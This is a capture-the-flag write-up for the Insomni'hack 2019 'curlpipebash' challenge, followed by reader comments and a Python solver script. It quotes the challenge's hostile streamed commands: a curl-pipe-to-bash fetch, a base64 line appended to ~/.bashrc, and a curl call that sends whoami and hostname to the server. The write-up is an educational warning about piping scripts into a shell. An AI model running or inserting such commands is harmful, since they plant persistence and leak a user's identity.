Tags: bash curl 

Rating: 4.3

# curlpipebash

```
Welcome to Insomni'hack teaser 2019!

Execute this Bash command to print the flag :)

> curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
```

The request to `https://curlpipebash.teaser.insomnihack.ch/print-flag.sh` gets a streamed, chunked response: the server keeps the connection open and sends the script one line at a time, and `bash` executes each line as soon as it arrives.

Because the stream stays alive, the server can decide what to send next depending on which of its other endpoints we hit in the meantime.

## Request flow

We start the streamed, chunked response by running

```
curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
```

print-flag.sh replies with a new curl command that contains a UUID:

```
curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID | bash
```

When that command is executed, the request for the UUID URL is what the server is waiting for; the still-open print-flag.sh stream then gives us two new commands:

```
base64 -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK
```

The base64 string decodes to `export PROMPT_COMMAND='echo THANK YOU FOR PLAYING INSOMNIHACK TEASER 2019'`, which this command appends to `~/.bashrc`. The second command reports `user@host` back to the server, relying on bash to expand `$(whoami)` and `$(hostname)` before curl runs:

```
curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname)
```

Once these are executed, print-flag.sh gives us the final command:

```
echo "Welcome to the wall of shame"
```

and finishes.

## Solution

To solve, keep the streamed `print-flag.sh` connection open, issue the requests the stream asks for yourself, and simply omit the `add-to-wall-of-shame` call: fetching the UUID URL is what unlocks the next lines, and when the server never sees the self-reporting request it streams the flag instead of the wall-of-shame message. Reading the lines and making the requests by hand, rather than piping to `bash`, also means the `.bashrc` implant is never executed.

[Complete solution and "exploit" code available here](https://github.com/EdwardPwnden/ctf-2019/tree/master/Insomnihack_Teaser/curlpipebash)

Original writeup (https://github.com/EdwardPwnden/ctf-2019/tree/master/Insomnihack_Teaser/curlpipebash).
Q5Ca, Jan. 20, 2019, 4:33 p.m.

I ran your exploit code, but after the request with the UUID was executed I didn't receive any new command.
Output:

```
print-flag got line: b'curl -Ns https://curlpipebash.teaser.insomnihack.ch/28742838-bc89-4e31-8d14-f4c49ae7c303 | bash'
Requesting new url: b'https://curlpipebash.teaser.insomnihack.ch/28742838-bc89-4e31-8d14-f4c49ae7c303'
```


y12uN, Jan. 21, 2019, 1:53 a.m.

I can't run the script locally either. But it works on https://repl.it/.

```python
# modify the script to support py3
import requests

headers = {
    "User-Agent": "curl/7.61.0"  # if it looks like curl and talks like curl...
}


def main():
    url = "https://curlpipebash.teaser.insomnihack.ch/print-flag.sh"
    # keep the streamed print-flag.sh response open and read it line by line
    r = requests.get(url, headers=headers, stream=True)
    for l in r.iter_lines():
        print("print-flag got line: {}".format(l))
        # We want to curl all new urls, but not the wall of shame one!
        if b"curl" in l and b"shame" not in l:
            new_link = l.split(b" ")[2]  # who needs regex?..
            print("Requesting new url: {}".format(new_link))
            requests.get(new_link, headers=headers)


if __name__ == "__main__":
    main()
```

Output:

```
Python 3.6.1 (default, Dec 2015, 13:05:11)
[GCC 4.8.2] on linux
print-flag got line: b'curl -Ns https://curlpipebash.teaser.insomnihack.ch/66aafadc-4636-4405-a2d1-8d11f35dd7c4 | bash'
Requesting new url: b'https://curlpipebash.teaser.insomnihack.ch/66aafadc-4636-4405-a2d1-8d11f35dd7c4'
print-flag got line: b'base64 -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK'
print-flag got line: b'curl -Ns https://curlpipebash.teaser.insomnihack.ch/66aafadc-4636-4405-a2d1-8d11f35dd7c4/add-to-wall-of-shame/$(whoami)%40$(hostname)'
print-flag got line: b'INS{Miss me with that fishy pipe}'
```


ta1yak1, Jan. 21, 2019, 6:03 a.m.

I can't receive any commands by running the modified script above.

Apparently the result of `requests.get(new_link, headers=headers)` seems to be empty.


bbdog, Jan. 21, 2019, 9:11 a.m.

Unable to understand


bbdog, Jan. 21, 2019, 9:23 a.m.

I don't know why I can't receive the result every time I request the UUID URL.


Q5Ca, Jan. 21, 2019, 6:26 p.m.

@y12uN Thanks for your reply :) So the problem is about Network Address Translation, right?